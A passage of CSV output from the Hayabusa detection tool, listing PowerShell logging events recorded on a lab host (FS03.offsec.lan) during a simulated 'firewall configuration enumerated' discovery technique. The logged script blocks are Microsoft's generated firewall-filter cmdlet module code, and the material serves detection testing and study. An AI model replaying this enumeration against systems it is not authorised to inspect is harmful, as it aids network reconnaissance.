$myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceTypeFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 